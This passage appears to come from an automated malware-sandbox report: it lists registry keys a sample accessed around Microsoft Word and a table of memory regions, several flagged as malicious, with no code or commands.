HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\35300
35300
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
EquationEditorFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\StillImage\Trace\wiaaut.dll
TraceFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\StillImage\Trace\wiaaut.dll
TraceMask
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\StillImage\Trace\wiaaut.dll
TraceLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\StillImage\Trace\wiaaut.dll
MaxTraceArraySize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\StillImage\Trace\wiaaut.dll
EnableObjectTracking
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\StillImage\Trace\wiaaut.dll
HeapOptions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 345 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
remote allocation
page execute and read and write
 malicious
16400000
trusted library section
page read and write
 malicious
40D8000
trusted library allocation
page read and write
 malicious
8F5000
heap
page read and write
 malicious
911000
heap
page read and write
 malicious
363000
heap
page read and write
4ADD000
stack
page read and write
2ACE000
stack
page read and write
37A000
heap
page read and write
20000
heap
page read and write
40F000
heap
page read and write
5CE000
heap
page read and write
2285000
trusted library allocation
page read and write
5D2E000
stack
page read and write
449E000
stack
page read and write
4E4D000
stack
page read and write
3B11000
heap
page read and write
4010000
heap
page read and write
7906000
trusted library allocation
page read and write
7B6D000
trusted library allocation
page read and write
15C000
stack
page read and write
2803000
trusted library allocation
page read and write
3B8E000
heap
page read and write
21D000
trusted library allocation
page execute and read and write
3A8F000
stack
page read and write
4C4E000
stack
page read and write | page guard
52C000
heap
page read and write
806000
heap
page read and write
3D3000
heap
page read and write
3A7000
heap
page read and write
720000
heap
page read and write
381E000
stack
page read and write
819000
trusted library allocation
page read and write
830000
trusted library allocation
page read and write
3529000
heap
page read and write
4D0000
heap
page read and write
22CF000
stack
page read and write
31D0000
heap
page read and write
5D1E000
stack
page read and write
B321000
trusted library allocation
page read and write
610000
heap
page read and write
322000
heap
page read and write
140000
trusted library allocation
page read and write
2290000
trusted library allocation
page read and write
2547000
heap
page read and write
535000
heap
page read and write
37DF000
heap
page read and write
4EAB000
heap
page read and write
290000
heap
page read and write
4DFE000
stack
page read and write
5C8E000
stack
page read and write
280000
trusted library allocation
page read and write
37C4000
heap
page read and write
48A0000
trusted library allocation
page read and write
9A0000
trusted library allocation
page read and write
3B08000
heap
page read and write
2F60000
heap
page read and write
2E30000
heap
page read and write
3C9000
heap
page read and write
28EE000
stack
page read and write
9B50000
heap
page read and write
400000
system
page execute and read and write
6171000
heap
page read and write
3852000
heap
page read and write
5C4000
heap
page read and write
2DA000
stack
page read and write
806000
heap
page read and write
87000
stack
page read and write
2A6E000
stack
page read and write
A0E000
heap
page read and write
246C000
heap
page read and write
5000000
heap
page read and write
36C1000
heap
page read and write
94A000
heap
page read and write
2800000
trusted library allocation
page read and write
3834000
heap
page read and write
34D000
heap
page read and write
3B40000
heap
page read and write
90FD000
stack
page read and write
257A000
heap
page read and write
7745000
trusted library allocation
page read and write
2480000
trusted library allocation
page read and write
4D8F000
stack
page read and write
28F2000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
3DF000
stack
page read and write
396C000
stack
page read and write
24A7000
trusted library allocation
page read and write
2FDE000
stack
page read and write
93BD000
stack
page read and write
2461000
trusted library allocation
page read and write
2241000
trusted library allocation
page read and write
49A0000
heap
page read and write
343000
heap
page read and write
450000
trusted library allocation
page execute and read and write
213D000
heap
page read and write
4ABF000
stack
page read and write
8BFD000
heap
page read and write
2DBF000
stack
page read and write
24C000
heap
page read and write
27B1000
trusted library allocation
page read and write
580000
remote allocation
page read and write
7B0000
trusted library allocation
page read and write
2589000
heap
page read and write
56E000
stack
page read and write
2220000
heap
page read and write
31A000
heap
page read and write
150000
trusted library allocation
page read and write
2BB000
heap
page read and write
29B000
stack
page read and write
257A000
heap
page read and write
10F000
heap
page read and write
51C4000
heap
page read and write
3821000
heap
page read and write
A3E000
stack
page read and write
4BA2000
heap
page read and write
429E000
stack
page read and write
4BB000
heap
page read and write
24FD000
heap
page read and write
380000
heap
page read and write
4EDF000
heap
page read and write
10321000
trusted library allocation
page read and write
770000
heap
page execute and read and write
5DE000
stack
page read and write
98D000
stack
page read and write
9D21000
trusted library allocation
page read and write
396000
heap
page read and write
251B000
heap
page read and write
9F0000
trusted library allocation
page read and write
520000
heap
page read and write
813000
heap
page read and write
574000
heap
page read and write
2BCE000
stack
page read and write
3B2000
heap
page read and write
2520000
heap
page read and write
37E1000
heap
page read and write
4F1B000
heap
page read and write
10000
heap
page read and write
38FC000
stack
page read and write
3525000
heap
page read and write
2390000
trusted library allocation
page execute and read and write
8B0000
heap
page read and write
51F000
heap
page read and write
5C8000
heap
page read and write
349000
heap
page read and write
489F000
stack
page read and write
4B05000
heap
page read and write
35D000
heap
page read and write
43CF000
stack
page read and write
24EF000
stack
page read and write
A10000
heap
page execute and read and write
110000
heap
page read and write
1E0000
heap
page read and write
22E0000
trusted library allocation
page read and write
2E8000
heap
page read and write
AE0000
trusted library allocation
page read and write
48A0000
trusted library allocation
page read and write
4041000
heap
page read and write
923E000
stack
page read and write
52F000
heap
page read and write
8D0000
heap
page read and write
1E7000
stack
page read and write
3F0000
trusted library allocation
page read and write
4EA4000
heap
page read and write
2EE000
stack
page read and write
4EC000
heap
page read and write
4A00000
heap
page read and write
AF0000
trusted library allocation
page read and write
3B42000
heap
page read and write
813000
heap
page read and write
9ED000
heap
page read and write
4F7E000
stack
page read and write
840000
trusted library allocation
page execute and read and write
4AF9000
heap
page read and write
52C000
heap
page read and write
6D21000
trusted library allocation
page read and write
2F0E000
stack
page read and write
6205000
trusted library allocation
page read and write
436B000
stack
page read and write
3E00000
heap
page read and write
A3D000
stack
page read and write
4ECF000
stack
page read and write
2D5000
heap
page read and write
3B10000
heap
page read and write
3E0F000
stack
page read and write
20000
heap
page read and write
50E000
heap
page read and write
690000
heap
page read and write
4B1F000
stack
page read and write
18A000
stack
page read and write
740000
heap
page read and write
3D0000
heap
page execute and read and write
3DB000
heap
page read and write
45C000
system
page execute and read and write
2547000
heap
page read and write
87E000
stack
page read and write
37D1000
heap
page read and write
6321000
trusted library allocation
page read and write
24C000
heap
page read and write
3DF000
heap
page read and write
51E2000
heap
page read and write
200000
trusted library allocation
page read and write
3D6000
heap
page read and write
400000
system
page execute and read and write
3269000
trusted library allocation
page read and write
326000
heap
page read and write
3B14000
heap
page read and write
95B0000
heap
page read and write
2528000
heap
page read and write
319000
heap
page read and write
24A8000
trusted library allocation
page read and write
1AA000
trusted library allocation
page read and write
4250000
trusted library allocation
page read and write
3471000
trusted library allocation
page read and write
47A000
stack
page read and write
3BB000
heap
page read and write
2EB000
heap
page read and write
2C1E000
stack
page read and write
2723000
trusted library allocation
page read and write
520000
heap
page read and write
8D7000
heap
page read and write
9EC000
stack
page read and write
5C8000
heap
page read and write
3C3000
heap
page read and write
3B41000
heap
page read and write
4B4E000
stack
page read and write
61F0000
trusted library allocation
page read and write
4F74000
heap
page read and write
8BE0000
heap
page read and write
46DD000
stack
page read and write
37F2000
heap
page read and write
1D5E000
stack
page read and write
3B82000
heap
page read and write
400000
trusted library allocation
page execute and read and write
5E0000
heap
page read and write
453000
heap
page read and write
6AA000
trusted library allocation
page execute and read and write
2150000
heap
page read and write
5CA000
heap
page read and write
4F6F000
heap
page read and write
5C8000
heap
page read and write
538000
heap
page read and write
5054000
heap
page read and write
550000
heap
page read and write
7904000
trusted library allocation
page read and write
4B7D000
heap
page read and write
10000000
direct allocation
page read and write
227D000
stack
page read and write
2EE000
heap
page read and write
2585000
heap
page read and write
241F000
stack
page read and write
52F000
heap
page read and write
6B5000
heap
page read and write
52F000
heap
page read and write
37C1000
heap
page read and write
4BBD000
stack
page read and write
2ED000
heap
page read and write
36BD000
stack
page read and write
3E45000
heap
page read and write
274F000
trusted library allocation
page read and write
37C9000
heap
page read and write
A30000
heap
page read and write
3BE000
heap
page read and write
10000
heap
page read and write
3B8E000
heap
page read and write
3852000
heap
page read and write
707000
heap
page read and write
4EA0000
heap
page read and write
670000
trusted library allocation
page read and write
83F000
stack
page read and write
49FE000
stack
page read and write
52B000
heap
page read and write
92F000
heap
page read and write
2547000
heap
page read and write
100000
heap
page read and write
3B14000
heap
page read and write
359000
heap
page read and write
7EF20000
trusted library allocation
page execute and read and write
2C4000
heap
page read and write
2C68000
heap
page read and write
4BFE000
stack
page read and write
2530000
heap
page read and write
5050000
heap
page read and write
2370000
heap
page read and write
3F3F000
stack
page read and write
2763000
trusted library allocation
page read and write
274E000
stack
page read and write
47B000
heap
page read and write
3E6000
heap
page read and write
26C4000
trusted library allocation
page read and write
4B22000
heap
page read and write
73C000
stack
page read and write
2AE000
heap
page read and write
7F8000
heap
page read and write
249E000
trusted library allocation
page read and write
278E000
stack
page read and write
412000
heap
page read and write
2B6D000
stack
page read and write
28EF000
stack
page read and write
813000
heap
page read and write
3DF0000
heap
page read and write
749000
trusted library allocation
page read and write
458B000
stack
page read and write
52F000
heap
page read and write
3824000
heap
page read and write
24C000
heap
page read and write
346000
heap
page read and write
4BC3000
heap
page read and write
4C0E000
stack
page read and write
42A0000
trusted library allocation
page read and write
2B5E000
stack
page read and write
AAA000
stack
page read and write
5DDE000
stack
page read and write | page guard
2E1000
heap
page read and write
275A000
trusted library allocation
page read and write
4370000
trusted library allocation
page read and write
8DE000
stack
page read and write
1DF0000
heap
page read and write
409E000
stack
page read and write
154000
trusted library allocation
page read and write
3230000
heap
page read and write
207000
trusted library allocation
page execute and read and write
3820000
heap
page read and write
2DDE000
stack
page read and write
3420000
heap
page read and write
4E3E000
stack
page read and write
4BBB000
heap
page read and write
59B000
heap
page read and write
2420000
heap
page execute and read and write
190000
heap
page read and write
10000
heap
page read and write
2AF000
heap
page read and write
2C9000
trusted library allocation
page read and write
537000
heap
page read and write
743000
trusted library allocation
page read and write
2A0000
heap
page read and write
2945000
trusted library allocation
page read and write
485000
heap
page read and write
5ED0000
heap
page read and write
8C0F000
heap
page read and write
740000
heap
page read and write
31D000
heap
page read and write
451E000
stack
page read and write
36C0000
heap
page read and write
2EE000
heap
page read and write
236F000
stack
page read and write
4EA8000
heap
page read and write
7F8000
heap
page read and write
4D7000
heap
page read and write
259F000
stack
page read and write
7F8000
heap
page read and write
A50000
heap
page read and write
7773000
trusted library allocation
page read and write
1D9E000
stack
page read and write
45A0000
trusted library allocation
page read and write
832000
heap
page read and write
4AF0000
heap
page read and write
405F000
stack
page read and write
44E000
unkown
page read and write
683000
trusted library allocation
page execute and read and write
250000
trusted library allocation
page execute and read and write
8BE000
stack
page read and write
684000
trusted library allocation
page read and write
3272000
trusted library allocation
page read and write
A16000
heap
page execute and read and write
4B06000
heap
page read and write
2B8C000
stack
page read and write
9760000
trusted library allocation
page read and write
49E000
heap
page read and write
234E000
stack
page read and write
2C7D000
stack
page read and write
200F000
stack
page read and write
2B2000
stack
page read and write
1DB0000
heap
page read and write
2B0000
heap
page read and write
6B2000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
10000
heap
page read and write
3AF5000
heap
page read and write
252B000
heap
page read and write
4B5E000
stack
page read and write
556000
heap
page read and write
89E000
trusted library allocation
page read and write
10000
heap
page read and write
60DE000
stack
page read and write
670000
heap
page read and write
5F50000
heap
page read and write
4A2E000
stack
page read and write
2430000
heap
page read and write
6241000
trusted library allocation
page read and write
2483000
trusted library allocation
page read and write
510000
heap
page read and write
247000
heap
page read and write
3EB000
heap
page read and write
35D0000
heap
page read and write
37D9000
heap
page read and write
450000
heap
page read and write
AEC000
stack
page read and write
26D000
heap
page read and write
2B19000
trusted library allocation
page read and write
93F000
heap
page read and write
3499000
trusted library allocation
page read and write
2500000
heap
page read and write
2BAE000
stack
page read and write
8AA000
heap
page read and write
4AF9000
heap
page read and write
36E000
heap
page read and write
5CE000
heap
page read and write
249000
heap
page read and write
90C000
heap
page read and write
5A0000
heap
page read and write
4FE000
stack
page read and write
3B11000
heap
page read and write
4380000
trusted library allocation
page execute and read and write
810000
trusted library allocation
page read and write
3CD000
heap
page read and write
349000
heap
page read and write
94E000
stack
page read and write
6F0000
trusted library allocation
page read and write
33A9000
trusted library allocation
page read and write
37F2000
heap
page read and write
A13000
heap
page read and write
37F2000
heap
page read and write
213000
trusted library allocation
page execute and read and write
4F79000
heap
page read and write
9760000
trusted library allocation
page read and write
4D9000
heap
page read and write
6D2000
heap
page read and write
4CAE000
stack
page read and write
8C24000
heap
page read and write
8F9F000
stack
page read and write
59B000
heap
page read and write
3AB000
heap
page read and write
315E000
stack
page read and write
9F0000
trusted library allocation
page read and write
3B49000
heap
page read and write
43B000
heap
page read and write
400000
system
page execute and read and write
44A000
heap
page read and write
3EE000
heap
page read and write
28BC000
stack
page read and write
44DC000
stack
page read and write
320000
heap
page read and write
933F000
stack
page read and write
9760000
trusted library allocation
page read and write
2703000
trusted library allocation
page read and write
528000
heap
page read and write
43E000
heap
page read and write
6BE000
stack
page read and write
529000
heap
page read and write
316000
heap
page read and write
37D4000
heap
page read and write
6E0000
heap
page read and write
3D9000
heap
page read and write
392000
heap
page read and write
813000
trusted library allocation
page read and write
9D0000
heap
page read and write
198000
heap
page read and write
1E7F000
stack
page read and write
456000
heap
page read and write
4C0000
heap
page read and write
2515000
heap
page read and write
440E000
stack
page read and write
7B6F000
trusted library allocation
page read and write
4DBE000
stack
page read and write
6215000
trusted library allocation
page read and write
1F39000
heap
page read and write
9760000
trusted library allocation
page read and write
4C3F000
heap
page read and write
1E10000
heap
page read and write
4CA000
heap
page read and write
3520000
heap
page read and write
832000
heap
page read and write
258000
heap
page read and write
895000
heap
page read and write
96F0000
trusted library allocation
page read and write
113FE000
stack
page read and write
237B000
trusted library allocation
page read and write
383F000
heap
page read and write
3A90000
heap
page read and write
3DA9000
trusted library allocation
page read and write
5070000
heap
page read and write
2699000
heap
page read and write
478000
remote allocation
page execute and read and write
2500000
trusted library allocation
page read and write
94CF000
stack
page read and write
220000
heap
page read and write
2E0000
heap
page read and write
4D8E000
stack
page read and write | page guard
217F000
stack
page read and write
3B90000
heap
page read and write
2B5000
heap
page read and write
4C4F000
stack
page read and write
8D0000
trusted library allocation
page read and write
4AB000
stack
page read and write
267E000
stack
page read and write
8FC0000
heap
page read and write
2260000
trusted library allocation
page read and write
390000
heap
page read and write
447000
heap
page read and write
7A8D000
trusted library allocation
page read and write
68D000
trusted library allocation
page execute and read and write
3BE000
heap
page read and write
39A000
heap
page read and write
480000
heap
page read and write
4A5E000
stack
page read and write
3C9000
heap
page read and write
21BF000
stack
page read and write
3B7000
heap
page read and write
238E000
stack
page read and write
1F2E000
heap
page read and write
24E0000
heap
page read and write
2EA000
heap
page read and write
9760000
trusted library allocation
page read and write
349000
heap
page read and write
22DF000
stack
page read and write
2E4000
heap
page read and write
4C37000
heap
page read and write
A00000
trusted library allocation
page read and write
4EE0000
heap
page read and write
19D000
stack
page read and write
7F6000
heap
page read and write
948000
heap
page read and write
5F4D000
stack
page read and write
780000
heap
page read and write
10000
heap
page read and write
1B6000
heap
page read and write
518000
heap
page read and write
2744000
trusted library allocation
page read and write
5CD000
heap
page read and write
3EE000
heap
page read and write
310F000
stack
page read and write
4B22000
heap
page read and write
4C2D000
heap
page read and write
1BA000
stack
page read and write
10000
heap
page read and write
48DE000
stack
page read and write
2EE000
heap
page read and write
700000
heap
page read and write
3831000
heap
page read and write
8E5C000
stack
page read and write
91FD000
stack
page read and write
1D6000
heap
page read and write
210F000
stack
page read and write
A7E000
stack
page read and write
3B3F000
stack
page read and write
6B0000
heap
page read and write
3C9000
heap
page read and write
5E1E000
stack
page read and write
710000
heap
page read and write
4D4E000
stack
page read and write
2589000
heap
page read and write
8F0000
trusted library allocation
page read and write
6E0000
trusted library allocation
page read and write
3DE000
stack
page read and write | page guard
2270000
trusted library allocation
page read and write
300000
heap
page read and write
332000
heap
page read and write
3A3000
heap
page read and write
806000
heap
page read and write
4AFE000
stack
page read and write | page guard
3E2000
heap
page read and write
5C7000
heap
page read and write
44E000
stack
page read and write
3241000
trusted library allocation
page read and write
2120000
heap
page read and write
36D4000
heap
page read and write
832000
heap
page read and write
11401000
trusted library allocation
page read and write
45DE000
stack
page read and write
2290000
trusted library allocation
page read and write
252B000
heap
page read and write
22F0000
trusted library allocation
page execute and read and write
9760000
trusted library allocation
page read and write
282D000
trusted library allocation
page read and write
7BC1000
trusted library allocation
page read and write
3DF000
heap
page read and write
6EB000
heap
page read and write
1B5000
stack
page read and write
3DF000
heap
page read and write
3852000
heap
page read and write
2F30000
heap
page read and write
34A000
heap
page read and write
A37000
heap
page read and write
2B00000
trusted library allocation
page read and write
10C000
heap
page read and write
455000
heap
page read and write
3DF000
heap
page read and write
10000
heap
page read and write
5D2E000
stack
page read and write
806000
heap
page read and write
A20000
trusted library allocation
page read and write
3B77000
heap
page read and write
6CE000
stack
page read and write
3C9000
heap
page read and write
2186000
heap
page read and write
1F7000
heap
page read and write
7F6000
heap
page read and write
257000
stack
page read and write
3A00000
heap
page read and write
4B23000
heap
page read and write
200000
trusted library allocation
page read and write
4FC0000
heap
page read and write
474000
remote allocation
page execute and read and write
3834000
heap
page read and write
497D000
stack
page read and write
20E0000
heap
page read and write
2C0000
trusted library allocation
page read and write
386000
heap
page read and write
20000
heap
page read and write
700000
trusted library allocation
page execute and read and write
4E1E000
stack
page read and write
318000
heap
page read and write
7902000
trusted library allocation
page read and write
6CA000
heap
page read and write
2C60000
heap
page read and write
690000
trusted library allocation
page read and write
7A9000
heap
page read and write
318000
heap
page read and write
7779000
trusted library allocation
page read and write
41B000
system
page execute and read and write
2A0000
trusted library allocation
page read and write
4C0000
heap
page read and write
22E000
heap
page read and write
39D000
heap
page read and write
524000
heap
page read and write
4AFE000
stack
page read and write
9321000
trusted library allocation
page read and write
37DA000
heap
page read and write
69A000
trusted library allocation
page read and write
50E000
stack
page read and write
5022000
heap
page read and write
50D8000
heap
page read and write
990000
trusted library allocation
page read and write
22A0000
trusted library allocation
page execute and read and write
3390000
trusted library allocation
page read and write
1D4000
heap
page read and write
7751000
trusted library allocation
page read and write
9B0000
trusted library allocation
page read and write
89000
stack
page read and write
630000
heap
page read and write
50B0000
heap
page read and write
32B000
heap
page read and write
7321000
trusted library allocation
page read and write
37C0000
heap
page read and write
23D000
heap
page read and write
2518000
heap
page read and write
7F0000
trusted library allocation
page read and write
282000
trusted library allocation
page read and write
4AFB000
heap
page read and write
4BE1000
heap
page read and write
8DDF000
stack
page read and write
4DD000
stack
page read and write
940000
heap
page read and write
4A7E000
stack
page read and write
10000
heap
page read and write
8E0000
trusted library allocation
page read and write
297000
heap
page read and write
23DE000
stack
page read and write
4BA3000
heap
page read and write
6F2000
trusted library allocation
page read and write
806000
heap
page read and write
5CB000
heap
page read and write
28EE000
trusted library allocation
page read and write
2518000
heap
page read and write
10000
heap
page read and write
8C1F000
heap
page read and write
26F000
heap
page read and write
2280000
trusted library allocation
page read and write
4AA000
heap
page read and write
C321000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
2EE000
heap
page read and write
3E10000
heap
page read and write
96EC000
stack
page read and write
4F6D000
heap
page read and write
680000
trusted library allocation
page read and write
1FB000
stack
page read and write
45EE000
stack
page read and write
54C000
heap
page read and write
2503000
heap
page read and write
6A7000
trusted library allocation
page execute and read and write
42A000
heap
page read and write
23A000
heap
page read and write
304000
heap
page read and write
20C000
stack
page read and write
4ABE000
stack
page read and write
44BE000
stack
page read and write
9760000
trusted library allocation
page read and write
5CE000
heap
page read and write
3B20000
heap
page read and write
990000
heap
page read and write
24AF000
trusted library allocation
page read and write
4C3F000
heap
page read and write
697000
heap
page read and write
3275000
trusted library allocation
page read and write
510000
heap
page read and write
4470000
trusted library allocation
page read and write
7225000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
457D000
stack
page read and write
7E5000
trusted library allocation
page read and write
188000
stack
page read and write
900000
trusted library allocation
page read and write
37BF000
stack
page read and write
3A0000
heap
page read and write
36B000
heap
page read and write
3852000
heap
page read and write
940000
trusted library allocation
page read and write
2E8000
heap
page read and write
20000
heap
page read and write
2860000
trusted library allocation
page read and write
A30000
heap
page read and write
4B05000
heap
page read and write
3273000
trusted library allocation
page read and write
776000
heap
page read and write
517000
heap
page read and write
4B22000
heap
page read and write
3160000
heap
page read and write
4E8D000
stack
page read and write
2778000
trusted library allocation
page read and write
4B02000
heap
page read and write
AF0000
trusted library allocation
page read and write
10000
heap
page read and write
340F000
stack
page read and write
2824000
trusted library allocation
page read and write
4BCE000
stack
page read and write
37BC000
heap
page read and write
37F2000
heap
page read and write
10B000
heap
page read and write
7A77000
trusted library allocation
page read and write
248000
heap
page read and write
777000
heap
page read and write
3AB5000
heap
page read and write
480000
heap
page read and write
3A6000
heap
page read and write
7D1000
trusted library allocation
page read and write
24FE000
heap
page read and write
491E000
stack
page read and write
160000
heap
page read and write
253C000
heap
page read and write
3AFF000
heap
page read and write
9D0000
heap
page read and write
38F000
heap
page read and write
3D3000
heap
page read and write
7DE000
trusted library allocation
page read and write
1E20000
direct allocation
page read and write
3B89000
heap
page read and write
877000
heap
page read and write
920000
heap
page read and write
22C000
stack
page read and write
3852000
heap
page read and write
2A1000
heap
page read and write
990000
trusted library allocation
page read and write
4C10000
heap
page read and write
7EF000
heap
page read and write
260000
trusted library allocation
page read and write
52C000
heap
page read and write
AD0000
trusted library allocation
page read and write
3461000
trusted library allocation
page read and write
10F000
heap
page read and write
26C2000
trusted library allocation
page read and write
4FC0000
heap
page read and write
9A0000
trusted library allocation
page read and write
450000
heap
page read and write
2589000
heap
page read and write
45F000
heap
page read and write
83E000
stack
page read and write | page guard
50BE000
stack
page read and write
4A0E000
stack
page read and write
427000
heap
page read and write
A40000
trusted library allocation
page read and write
AA0000
heap
page read and write
36D0000
heap
page read and write
9760000
trusted library allocation
page read and write
9A0000
trusted library allocation
page read and write
251B000
heap
page read and write
255000
heap
page read and write
3AA000
heap
page read and write
27C3000
trusted library allocation
page read and write
200E000
stack
page read and write
52DE000
stack
page read and write
104000
heap
page read and write
4AE000
stack
page read and write
9760000
trusted library allocation
page read and write
3B81000
heap
page read and write
73B000
heap
page read and write
4D0000
heap
page read and write
937F000
stack
page read and write
4F80000
heap
page read and write
4420000
trusted library allocation
page execute and read and write
10F000
heap
page read and write
5CB000
heap
page read and write
291E000
stack
page read and write
7F0000
heap
page read and write
2EB000
heap
page read and write
100000
heap
page read and write
9760000
trusted library allocation
page read and write
1F0000
heap
page read and write
273F000
stack
page read and write
460000
trusted library allocation
page read and write
3B1E000
heap
page read and write
3B14000
heap
page read and write
15D000
trusted library allocation
page execute and read and write
726000
heap
page read and write
4E50000
heap
page read and write
45B000
heap
page read and write
10F000
heap
page read and write
4396000
heap
page execute and read and write
45F000
heap
page read and write
2CEF000
stack
page read and write
2EB000
heap
page read and write
4AF1000
heap
page read and write
45D000
heap
page read and write
777B000
trusted library allocation
page read and write
47E000
stack
page read and write
3FF000
stack
page read and write
362000
heap
page read and write
41F000
system
page execute and read and write
3489000
trusted library allocation
page read and write
1DB4000
heap
page read and write
25AB000
trusted library allocation
page read and write
747000
trusted library allocation
page read and write
971000
heap
page read and write
3C9000
heap
page read and write
50E000
heap
page read and write
21A000
stack
page read and write
1B0000
heap
page read and write
42EE000
stack
page read and write
2E00000
heap
page read and write
813000
heap
page read and write
4A5E000
stack
page read and write
36BF000
stack
page read and write
38A0000
heap
page read and write
74F000
heap
page read and write
740000
trusted library allocation
page read and write
970000
heap
page read and write
277E000
stack
page read and write
2511000
heap
page read and write
2E7000
heap
page read and write
3274000
trusted library allocation
page read and write
257D000
heap
page read and write
52C000
heap
page read and write
49CE000
stack
page read and write
3AB000
heap
page read and write
264000
heap
page read and write
2E0000
heap
page read and write
473000
system
page execute and read and write
580000
remote allocation
page read and write
2371000
heap
page read and write
4240000
trusted library allocation
page read and write
774D000
trusted library allocation
page read and write
51C0000
heap
page read and write
7BAD000
trusted library allocation
page read and write
5CB000
heap
page read and write
718000
heap
page read and write
3DC000
stack
page read and write
2471000
trusted library allocation
page read and write
2548000
heap
page read and write
25E4000
heap
page read and write
1C0000
heap
page read and write
2733000
trusted library allocation
page read and write
459000
system
page execute and read and write
2B4000
stack
page read and write
231F000
stack
page read and write
2240000
trusted library allocation
page read and write
51E000
stack
page read and write
456000
system
page execute and read and write
2BEE000
stack
page read and write
AEC000
stack
page read and write
7EA000
trusted library allocation
page read and write
890000
trusted library allocation
page read and write
8E1C000
stack
page read and write
2D5000
stack
page read and write
AF0000
trusted library allocation
page read and write
832000
heap
page read and write
580000
heap
page read and write
250A000
heap
page read and write
349000
heap
page read and write
365000
heap
page read and write
290000
heap
page read and write
27EF000
stack
page read and write
3B0B000
heap
page read and write
2BB000
heap
page read and write
461B000
stack
page read and write
24AB000
trusted library allocation
page read and write
300000
heap
page read and write
A90000
trusted library allocation
page read and write
5004000
heap
page read and write
5DEE000
stack
page read and write
3B0C000
heap
page read and write
398000
heap
